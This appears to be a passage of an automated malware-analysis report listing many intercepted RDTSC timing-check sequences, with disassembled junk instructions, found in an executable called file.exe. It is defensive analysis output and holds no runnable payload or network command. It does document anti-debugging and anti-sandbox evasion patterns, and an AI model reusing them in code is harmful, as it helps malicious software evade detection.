              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F85 second address: A77F9A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8C51D4DCh 0x00000008 ja 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77F9A second address: A77FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FDE8CE8B4C8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push ebx 0x00000022 ja 00007FDE8CE8B4C8h 0x00000028 pop edx 0x00000029 add edi, 5F85A936h 0x0000002f push 00000004h 0x00000031 add dword ptr [ebp+122D2A0Bh], esi 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007FDE8CE8B4D3h 0x0000003e push eax 0x0000003f push edx 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78385 second address: A7838A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7838A second address: A783D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 je 00007FDE8CE8B4C6h 0x0000000e push 0000001Eh 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FDE8CE8B4C8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a clc 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FDE8CE8B4D2h 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A784F2 second address: A784F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78757 second address: A787E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FDE8CE8B4C8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D3933h], ecx 0x0000002a jmp 00007FDE8CE8B4D7h 0x0000002f lea eax, dword ptr [ebp+1247C342h] 0x00000035 mov di, 078Fh 0x00000039 push eax 0x0000003a jmp 00007FDE8CE8B4D5h 0x0000003f mov dword ptr [esp], eax 0x00000042 mov ecx, dword ptr [ebp+122D2C2Fh] 0x00000048 lea eax, dword ptr [ebp+1247C2FEh] 0x0000004e movsx ecx, bx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jnp 00007FDE8CE8B4C6h 0x0000005b jnp 00007FDE8CE8B4C6h 0x00000061 popad 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB80E8 second address: AB80FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FDE8C51D4D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB80FF second address: AB8119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D3h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8119 second address: AB811E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB811E second address: AB815F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDE8CE8B4C6h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FDE8CE8B4D6h 0x00000013 push edx 0x00000014 jmp 00007FDE8CE8B4D6h 0x00000019 pop edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB815F second address: AB8168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8168 second address: AB816C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB816C second address: AB8180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB82CF second address: AB82D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB843E second address: AB8460 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE8C51D4D6h 0x00000008 jl 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FDE8C51D4E2h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB85CA second address: AB85DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FDE8CE8B4C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB85DA second address: AB85DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB85DE second address: AB85E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB85E8 second address: AB85EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB88A0 second address: AB88A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB88A4 second address: AB88AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB88AA second address: AB88B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB88B4 second address: AB88BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB88BA second address: AB88BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD200 second address: ABD204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD204 second address: ABD20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD8A0 second address: ABD8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD8A9 second address: ABD8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD8AD second address: ABD8C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FDE8C51D4E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD8C5 second address: ABD8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABD8CB second address: ABD8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 js 00007FDE8C51D4DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDC14 second address: ABDC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e push esi 0x0000000f jmp 00007FDE8CE8B4CBh 0x00000014 jl 00007FDE8CE8B4C6h 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDC48 second address: ABDC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE1D8 second address: ABE1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE1DE second address: ABE1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8C51D4DEh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE1F2 second address: ABE20B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDE8CE8B4D3h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE20B second address: ABE20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABE20F second address: ABE241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FDE8CE8B4CDh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE8CE8B4D8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC24BF second address: AC24CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC24CA second address: AC24D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC24D5 second address: AC24D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC24D9 second address: AC24DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4758 second address: AC4768 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4768 second address: AC476C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC42B2 second address: AC42C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E2h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC42C8 second address: AC42DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FDE8CE8B4C6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC42DC second address: AC42EC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE8C51D4D6h 0x00000008 jng 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4440 second address: AC4446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4446 second address: AC444C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB566 second address: ACB598 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDE8CE8B4CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDE8CE8B4D3h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FDE8CE8B4C6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB736 second address: ACB73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB73C second address: ACB746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEFE7 second address: ACEFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACEFEB second address: ACF000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FDE8CE8B4C6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE9B7 second address: ACE9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE9D6 second address: ACE9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACECDB second address: ACECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FDE8C51D4D6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACECE8 second address: ACED01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5850 second address: AD5856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5B3D second address: AD5B48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5B48 second address: AD5B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5CDA second address: AD5CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5CE7 second address: AD5CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5CEB second address: AD5D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDE8CE8B4D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDE8CE8B4CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5D13 second address: AD5D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5E47 second address: AD5E79 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE8CE8B4D3h 0x0000000f jmp 00007FDE8CE8B4D1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD5E79 second address: AD5E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF39F second address: ADF3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FDE8CE8B4C8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007FDE8CE8B4CBh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF3BE second address: ADF3D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 jmp 00007FDE8C51D4DBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD3A1 second address: ADD3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD3A5 second address: ADD3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD502 second address: ADD52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D1h 0x00000009 jbe 00007FDE8CE8B4C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE8CE8B4CDh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD52F second address: ADD535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD535 second address: ADD56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FDE8CE8B4C6h 0x0000000d jc 00007FDE8CE8B4C6h 0x00000013 jmp 00007FDE8CE8B4D1h 0x00000018 popad 0x00000019 popad 0x0000001a jnp 00007FDE8CE8B4F9h 0x00000020 push eax 0x00000021 push edx 0x00000022 jp 00007FDE8CE8B4C6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD56B second address: ADD56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD56F second address: ADD58D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6B9 second address: ADD6CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FDE8C51D4DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6CD second address: ADD6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6D1 second address: ADD6EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DFh 0x00000007 jo 00007FDE8C51D4DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6EA second address: ADD6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6F5 second address: ADD6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD6FC second address: ADD701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADD701 second address: ADD710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FDE8C51D4D6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDA24 second address: ADDA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDA2A second address: ADDA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FDE8C51D4EBh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDE8C51D4E3h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FDE8C51D4D6h 0x0000001c jp 00007FDE8C51D4D6h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDA5A second address: ADDA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDA5E second address: ADDA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADDA6A second address: ADDA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007FDE8CE8B4C6h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE2A7 second address: ADE2BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4DAh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE2BF second address: ADE2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADE844 second address: ADE848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
